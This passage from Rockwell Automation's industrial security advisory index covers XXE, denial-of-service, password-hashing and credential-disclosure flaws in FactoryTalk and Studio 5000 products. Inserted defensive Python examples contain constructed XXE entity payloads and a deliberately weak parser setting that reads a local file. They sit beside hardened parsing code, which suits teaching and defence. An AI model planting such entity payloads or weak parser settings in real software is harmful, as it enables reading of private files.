CVE-2020-12027: Information disclosure affecting remote endpoints
FactoryTalk View SE discloses the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts.

CVSS v3.1 Base Score: 5.3 (MEDIUM)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
ZDI Tracking: ZDI-CAN-10281, ZDI-CAN-10282, ZDI-CAN-10291

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk View SE are encouraged to apply the patch or deploy recommended built in security features that addresses the associated risk. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Information: CVE-2020-12029
Recommended User Actions: Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied (QA49264 - Patch Roll-up for CPR9 SRx). Apply patch BF25481.

Vulnerability Information: CVE-2020-12031
Recommended User Actions: Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied (QA49264 - Patch Roll-up for CPR9 SRx). Apply patch found in BF25482.

Vulnerability Information: CVE-2020-12028, CVE-2020-12027
Recommended User Actions: This vulnerability is remediated by enabling built-in security features found within FactoryTalk View SE. Users should follow guidance found in QA46277 and QA59546 to set up IPSec and/or HTTPS, respectively.

Note: The Cisco Talos team developed Snort rules to detect these vulnerabilities (sid:54670-54675).

Additionally, Claroty has provided the following detections:
Rule Name: FactoryTalk View SE Directory Traversal CVE-2020-12027
Detection Identifier: 1000000055

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • Zero Day Initiative: Chaining 5 Bugs for Code Execution on the Rockwell FactoryTalk View SE HMI at Pwn2Own Miami

Low
PN1509 | PN1509 | Studio 5000 Logix Designer XML External Entity (XXE) Vulnerability Found During Pwn2Own Competition
Published Date:
August 11, 2020
Last Updated:
August 11, 2020
CVE IDs:
CVE-2020-12025
Products:
Logix Designer
CVSS Scores:
3.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.1
Revision History
Version 1.1 - August 11, 2020. Updated Recommended User Actions
Version 1.0 - July 8, 2020. Initial Version.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of an XML External Entity (XXE) flaw in the way the Studio 5000 Logix Designer® software parses AML and RDF files. An attacker may utilize this vulnerability to parse a malicious file, which could result in information disclosure.

Special thanks to The Incite Team for reporting this vulnerability through Pwn2Own. This vulnerability was independently co-discovered by researchers at Claroty after the competition.

Affected Products

Logix Designer Studio 5000 versions 32.00, 32.01, and 32.02.

Vulnerability Details

CVE-2020-12025: XXE Vulnerability Could Lead to Unauthorized Information Disclosure
Logix Designer Studio 5000 utilizes a third-party XML parser, which natively accepts AML and RDF files from any external entity. If successfully exploited, an unauthenticated attacker may be able to craft a malicious file, which when parsed, could lead to some information disclosure of hostnames or other resources from the program.

Other versions of Studio 5000 Logix Designer do not use this parser and therefore are not affected by this vulnerability. Versions 32.00, 32.01, and 32.02 contain the vulnerable code; however, this vulnerability is considered LOW severity since the exploit relies on user interaction and on the limited data that would be provided to the attacker.

CVSSv3 Base Score: 3.6 (LOW)
CVSSv3 Vector String: AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
ZDI Tracking: ZDI-CAN-10290
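
As an added example (not Rockwell Automation's or Studio 5000's code; the AML samples, the placeholder SYSTEM identifier and the function names are constructed for this demonstration), the check below uses Python's expat bindings to reject AML/RDF input that declares or references an external entity before the file is handed to the application parser, which is the hardening a tool that imports such files from untrusted sources needs:

```python
"""Pre-parse check for untrusted AML/RDF (XML) files that refuses external entities.

Added example, not Rockwell Automation's or Studio 5000's code; the sample
documents below are constructed for the demonstration.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when an untrusted XML document uses a DTD feature that enables XXE."""


def find_external_entities(data: bytes) -> list:
    """Scan an XML document with expat and list every DTD construct that would pull
    content from outside the document. An empty list means none was declared."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()

    # <!ENTITY name SYSTEM "..."> or PUBLIC "...": the entity's value is a file or URL.
    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            kind = "parameter" if is_parameter else "general"
            findings.append(f"external {kind} entity '{name}' -> {system_id or public_id}")

    # <!DOCTYPE root SYSTEM "...">: the DTD itself would be fetched from outside.
    def doctype_start(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            findings.append(f"external DTD for '{name}' -> {system_id or public_id}")

    # Called when content references an external entity; returning 0 aborts the
    # parse, so nothing is ever fetched even during this scan.
    def external_ref(context, base, system_id, public_id):
        findings.append(f"reference to external entity blocked -> {system_id or public_id}")
        return 0

    parser.EntityDeclHandler = entity_decl
    parser.StartDoctypeDeclHandler = doctype_start
    parser.ExternalEntityRefHandler = external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        # Either our handler aborted the parse (findings already recorded) or the
        # file is not well-formed; report the latter so the caller rejects it too.
        if not findings:
            findings.append(f"not well-formed: {exc}")
    return findings


def load_untrusted_xml(data: bytes) -> ET.Element:
    """Parse an AML/RDF file received from an untrusted source, refusing XXE."""
    findings = find_external_entities(data)
    if findings:
        raise UnsafeXmlError("; ".join(findings))
    # ElementTree does not fetch external entities; the explicit check above turns
    # a would-be obscure parse error into a clear, loggable rejection.
    return ET.fromstring(data)


def is_safe_to_import(data: bytes) -> bool:
    """True when the document passed the check and parsed cleanly."""
    try:
        load_untrusted_xml(data)
    except (UnsafeXmlError, ET.ParseError):
        return False
    return True


# Constructed minimal AutomationML (CAEX) document, as an import tool might see it.
CLEAN_AML = b"""<?xml version="1.0" encoding="utf-8"?>
<CAEXFile FileName="line1.aml" SchemaVersion="2.15">
  <InstanceHierarchy Name="Plant">
    <InternalElement Name="Conveyor01" ID="GUID-PLACEHOLDER-1"/>
  </InstanceHierarchy>
</CAEXFile>
"""

# Same document with an external entity declared and referenced: the pattern
# behind CVE-2020-12025. The SYSTEM identifier is a placeholder, not a real path.
XXE_AML = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE CAEXFile [
  <!ENTITY ext SYSTEM "file:///PLACEHOLDER/local-resource">
]>
<CAEXFile FileName="line1.aml" SchemaVersion="2.15">
  <InstanceHierarchy Name="Plant">&ext;</InstanceHierarchy>
</CAEXFile>
"""

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_AML), ("xxe", XXE_AML)):
        verdict = "import" if is_safe_to_import(doc) else "reject"
        print(label, "->", verdict, find_external_entities(doc))
```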

Risk Mitigation & User Action

Customers using the affected versions of Studio 5000 Logix Designer are encouraged to update to Studio 5000 Logix Designer version v32.03.
Vulnerability Information: CVE-2020-12025
Recommended User Actions: Update to v32.03 of Logix Designer Studio 5000.

Rockwell Automation customers using AML or RDF files should not accept files from unknown sources and remain cautious of social engineering attempts that may take advantage of this vulnerability.

General Security Guidelines

Social Engineering Mitigation Strategies
  • Rockwell Automation customers using AML or RDF files should not accept files from unknown sources and remain cautious of social engineering attempts that may take advantage of this vulnerability.
  • Do not open untrusted AML or RDF files within Studio 5000 Logix Designer.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1025 | PN1025 | CompactLogix / Compact GuardLogix 5370 Denial of Service
Published Date:
August 10, 2020
Last Updated:
August 10, 2020
CVE IDs:
CVE-2017-9312
Products:
Armor CompactLogix, Compact GuardLogix 5370, CompactLogix 5370
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.3
Revision History
Version 1.3 / August 10, 2020 - Updated affected products and suggested actions.
Version 1.2 / May 18, 2020 - Updated release product and corrected product version information.
Version 1.1 / July 12, 2018 - Updated product version information.
Version 1.0 / June 21, 2019 - Initial Release
Overview

A vulnerability exists in certain CompactLogix™ 5370 and Compact GuardLogix® 5370 programmable automation controllers that, if successfully exploited, may cause a Denial of Service (DoS) condition. These products are used to control processes across several industries, including without limitation, critical infrastructure; water/wastewater systems; entertainment; food and beverage; and automotive applications. Due to the breadth of platforms potentially affected, Rockwell Automation® has been conducting thorough evaluations to help achieve completeness in its risk assessment and mitigation processes.

Specific details of this vulnerability were disclosed publicly by researchers presenting at the ICS Cyber Security Conference in Singapore on April 25, 2018. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • CompactLogix 5370 L1 controllers, versions 30.014 and earlier, excluding version 28.015
  • CompactLogix 5370 L2 controllers, versions 30.014 and earlier, excluding version 28.015
  • CompactLogix 5370 L3 controllers, versions 30.014 and earlier, excluding version 28.015
  • Armor CompactLogix 5370 L3 controllers, versions 30.014 and earlier, excluding version 28.015
  • Compact GuardLogix 5370 controllers, versions 30.014 and earlier, excluding version 28.015
  • Armor Compact GuardLogix 5370 controllers, versions 30.014 and earlier, excluding version 28.015

Vulnerability Details

This vulnerability may allow a threat actor to intentionally send a specific TCP packet to the product and cause a Major Non-Recoverable Fault (MNRF), resulting in a Denial of Service (DoS) condition. An MNRF is a controlled action taken by the controller when it determines that it can no longer continue safe operation. When a Logix controller determines that an MNRF is the right course of action, the controller is designed to fault, taking it out of run mode, logging diagnostic data, and then invalidating and deleting the controller’s memory. This action requires an application program reload to guarantee the controller has a valid program to continue safe operation.

Alexey Perepechko of Applied Risk discovered this vulnerability in the 1769 Compact GuardLogix 5370 controllers. Rockwell Automation further investigated and discovered additional products affected by this vulnerability and they are included in this advisory.

This vulnerability is remotely exploitable. The impact of such an attack would be highly dependent on the nature of the attack, the design of the control system and other controls a user may have in place.

COMPACT GUARDLOGIX ADDITIONAL DETAILS
If a Major Non-Recoverable Fault (MNRF) occurs in a Compact GuardLogix controller, the safety task execution stops and CIP Safety I/O modules are placed into their safe state. All other I/O modules will transition to their configured fault state (for example, Hold Last State). Memory will be marked as invalid and cleared. It is important to note that the memory clear is controlled and intentional, as the controller has determined internally that something is wrong and cannot guarantee continued safe controller execution. As a result, the controller goes into an MNRF state, which is considered safe. Recovery requires that you download the application program again.

COMPACTLOGIX ADDITIONAL DETAILS
If a Major Non-Recoverable Fault (MNRF) occurs in a CompactLogix controller, all I/O modules will transition to their configured fault state (for example, Hold Last State). Memory will be marked as invalid and cleared. It is important to note that the memory clear is controlled and intentional, as the controller has determined internally that something is wrong and cannot guarantee continued safe controller execution. As a result, the controller goes into an MNRF state, which is considered safe. Recovery requires that you download the application program again.

CVE-2017-9312 has been assigned to this vulnerability. Rockwell Automation evaluated the vulnerability using the Common Vulnerability Scoring System (CVSS) v3.0. A CVSS v3 base score of 8.6 has been assigned. For a better understanding of how this score was generated, please follow this link with the CVSS v3 vector string: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H.

Risk Mitigation & User Action

Customers using the affected controllers are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Type: Small Controllers
Product Family: CompactLogix 5370 L1, CompactLogix 5370 L2, CompactLogix 5370 L3, Armor CompactLogix 5370 L3
Catalog Numbers: 1769-L16ER-BB1B, 1769-L18ER-BB1B, 1769-L18ERM-BB1B, 1769-L19ER-BB1B, 1769-L24ER-QB1B, 1769-L24ER-QBFC1B, 1769-L27ER-QBFC1B, 1769-L30ER, 1769-L30ER-NSE, 1769-L30ERM, 1769-L33ER, 1769-L33ERM, 1769-L36ERM, 1769-L37ERMO
Suggested Actions: Apply FRN 28.015 or apply 31.011 or later.

Product Type: Safety Controllers
Product Family: Compact GuardLogix 5370, Armor Compact GuardLogix 5370 L3
Catalog Numbers: 1769-L30ERMS, 1769-L33ERMS, 1769-L36ERMS, 1769-L37ERMS, 1769-L38ERMS, 1769-L33ERMOS, 1769-L36ERMOS
Suggested Actions: Apply FRN 28.015 or apply 31.011 or later.

Note: For 1769-L33ERMOS and 1769-L36ERMOS, apply firmware for 1769-L33ERMS and 1769-L36ERMS respectively.

General Security Guidelines

  1. Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.
  2. Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  3. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.
Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.
We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.
Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.
If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • [ICS-CERT/NCCIC] ICSA-18-127-02 Rockwell Automation Allen-Bradley CompactLogix and Compact GuardLogix
Attachments
File
v1.1_KB1073708 CompactLogix Denial of Service Vulnerability.pdf

Critical
PN1525 | PN1525 | FactoryTalk Services Platform Improper User Password Hashing
Published Date:
July 30, 2020
Last Updated:
July 30, 2020
CVE IDs:
CVE-2020-14516
Products:
FactoryTalk Services Platform
CVSS Scores:
10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - July 30, 2020. Initial Release.

Executive Summary

A vulnerability exists in FactoryTalk® Services Platform that prevents user passwords from being hashed properly. This vulnerability, if successfully exploited, may allow attackers to access and modify configuration and application data. This vulnerability only impacts native FactoryTalk Security users, not Windows® linked users.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform, versions 6.10.00 and 6.11.00.

Nearly all FactoryTalk software ships with FactoryTalk Services Platform. If you are unsure if you have FactoryTalk Services Platform installed, please see Knowledgebase QA5266 for additional details.

Vulnerability Details

CVE-2020-14516: Improper Implementation of Hashing Algorithm for User Passwords
There is an issue with the implementation of the SHA-256 hashing algorithm with FactoryTalk Services Platform 6.10 and 6.11 that prevents the user password from being hashed properly. A successful exploit could allow a remote, unauthenticated attacker to create new users in the FactoryTalk Services Platform administration console and this new user would allow the attacker to modify or delete configuration and application data in other FactoryTalk software connected to FactoryTalk Services Platform.

CVSS v3.0 Base Score: 10.0/CRITICAL
CVSS v3.0 Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Services Platform are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these measures with the general security guidelines to employ multiple strategies simultaneously.
Product Family: FactoryTalk Services Platform
Suggested Actions: Follow the guidance provided in Knowledgebase Article ID: BF10207 in order to patch (link).

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privileged user principle is followed, and the user/service account access to shared resources (such as a database) is only granted with the minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS
  • BF10207 – Passwords not properly encrypted using SHA256 encryption
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1515 | PN1515 | FactoryTalk View SE Credential Disclosure Vulnerabilities
Published Date:
June 25, 2020
Last Updated:
June 25, 2020
CVE IDs:
CVE-2020-14480, CVE-2020-14481
Products:
FactoryTalk View SE
CVSS Scores:
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 25, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from Ilya Karpov and Evgeny Druzhinin who are part of the independent research team, ScadaX Security. They reported two vulnerabilities in FactoryTalk® View Site Edition (SE) software, which if successfully exploited, may result in the disclosure of Windows® Logon credentials (via the DeskLock software) or FactoryTalk View SE user credentials.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE-2020-14480: FactoryTalk View SE versions 9.0 and earlier.
CVE-2020-14481: FactoryTalk View SE version 10.0.

Vulnerability Details

CVE-2020-14480: Cleartext Storage of Sensitive Information in Memory

A local, authenticated attacker may have access to certain credentials, including Windows Logon credentials, as a result of usernames/passwords being stored in plaintext in Random Access Memory (RAM).

CVSS v3.1 Base Score: 8.8/HIGH

CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE-2020-14481: Use of a Weak Algorithm for Password Protection

The DeskLock tool provided with FactoryTalk View SE uses a weak encryption algorithm that may allow a local, authenticated attacker to decipher user credentials, including the Windows user or Windows DeskLock passwords. If the compromised user has an administrative account, an attacker could gain full access to the user’s operating system and certain components of FactoryTalk View SE.

CVSS v3.1 Base Score: 8.8/HIGH

CVSS v3.1 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of DeskLock provided with FactoryTalk View SE are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

Product Family: FactoryTalk View SE
Catalog Numbers: 9701-VWSx
Suggested Actions:
  • CVE-2020-14480: Download v10.0 or later.
  • CVE-2020-14481: Download v11.0 or later.

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://www.us-cert.gov/ics/advisories/icsa-20-177-03

High
PN1516 | PN1516 | FactoryTalk Services Platform XXE Vulnerability
Published Date:
June 25, 2020
Last Updated:
June 25, 2020
CVE IDs:
CVE-2020-14478
Products:
FactoryTalk Services Platform
CVSS Scores:
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 25, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from researchers at Applied Risk regarding a vulnerability in versions of FactoryTalk® Services Platform which if successfully exploited, could lead to a denial-of-service (DoS) condition and to the arbitrary reading of any local file via system-level services.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform, versions 6.11.00 and earlier.

Nearly all FactoryTalk® software ships with FactoryTalk Services Platform. If you are unsure if you have FactoryTalk Services Platform installed, please see QA5266 for additional details.

Vulnerability Details

CVE-2020-14478: Weakly Configured XML Parser
A local, authenticated attacker could use an XML External Entity (XXE) attack to exploit weakly configured XML parser to access local or remote content. A successful exploit could potentially cause a denial-of-service (DoS) condition and allow the attacker to arbitrarily read any local file via system-level services. The details of this file could then be forwarded to the attacker.

CVSS v3.0 Base Score: 8.4/HIGH

CVSS v3.0 Vector String: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:H
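An added example, not code from Rockwell Automation or FactoryTalk, showing why a weakly configured XML parser exposes the local file read and DoS paths described above, next to a hardened configuration that refuses DTDs outright. It uses only Python's standard library; the document, file path and file contents are constructed.

```python
"""Weak versus hardened XML parsing, demonstrated with the standard library."""
import io
import os
import tempfile
import xml.parsers.expat
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class XmlRejected(ValueError):
    """Raised by the hardened parser when a document carries a DOCTYPE."""


class _TextCollector(ContentHandler):
    """SAX handler that just concatenates character data."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, data):
        self.parts.append(data)


def parse_weak(xml_bytes: bytes) -> str:
    """Weak configuration: external general entities are resolved, so an
    <!ENTITY ... SYSTEM "/path"> declaration pulls a local file into the
    document text (the arbitrary local file read named in the advisory).
    Shown only to make the failure mode concrete; never enable this."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the dangerous switch
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_hardened(xml_bytes: bytes) -> str:
    """Hardened configuration: no DOCTYPE at all, so neither external
    entities (file read) nor recursive entity expansion (CPU/memory DoS)
    can occur. Configuration data never needs a DTD, so rejecting is safe."""
    parser = xml.parsers.expat.ParserCreate()
    # never load parameter entities or an external DTD subset
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XmlRejected(f"DOCTYPE {name!r} is not allowed in configuration data")

    parser.StartDoctypeDeclHandler = on_doctype
    # belt and braces: returning 0 makes expat fail on any external entity ref
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    parts = []
    parser.CharacterDataHandler = parts.append
    parser.Parse(xml_bytes, True)
    return "".join(parts)


def demo():
    """Run both parsers on a constructed XXE-style document that points at a
    throwaway file. Returns (text the weak parser leaked, hardened rejected?)."""
    with tempfile.TemporaryDirectory() as workdir:
        local_file = os.path.join(workdir, "secret.txt")   # constructed target
        with open(local_file, "w", encoding="utf-8") as fh:
            fh.write("constructed-secret")
        doc = (
            '<?xml version="1.0"?>'
            f'<!DOCTYPE cfg [<!ENTITY ext SYSTEM "{local_file}">]>'
            "<cfg>&ext;</cfg>"
        ).encode("utf-8")
        leaked = parse_weak(doc)
        try:
            parse_hardened(doc)
            rejected = False
        except XmlRejected:
            rejected = True
    return leaked, rejected


if __name__ == "__main__":
    leaked_text, was_rejected = demo()
    print("weak parser leaked:", leaked_text)
    print("hardened parser rejected:", was_rejected)
```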

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk Services Platform are encouraged to update to an available software version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these measures with the general security guidelines to employ multiple strategies simultaneously.
Product Family: FactoryTalk Services Platform
Suggested Actions: Download patch for 6.11 (Download)

General Security Guidelines

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker application or another similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privileged user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (KAByrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://www.us-cert.gov/ics/advisories/icsa-20-177-02

Critical
PN1507 | PN1507 | FactoryTalk Linx Affected by Multiple Vulnerabilities
Published Date:
June 24, 2020
Last Updated:
June 24, 2020
CVE IDs:
CVE-2020-11999, CVE-2020-12005, CVE-2020-12003, CVE-2020-12001
Products:
FactoryTalk Linx Gateway
CVSS Scores:
7.5, 9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.1
Revision History
Version 1.1 - June 24, 2020. Corrected affected products.
Version 1.0 - June 11, 2020. Initial Release.

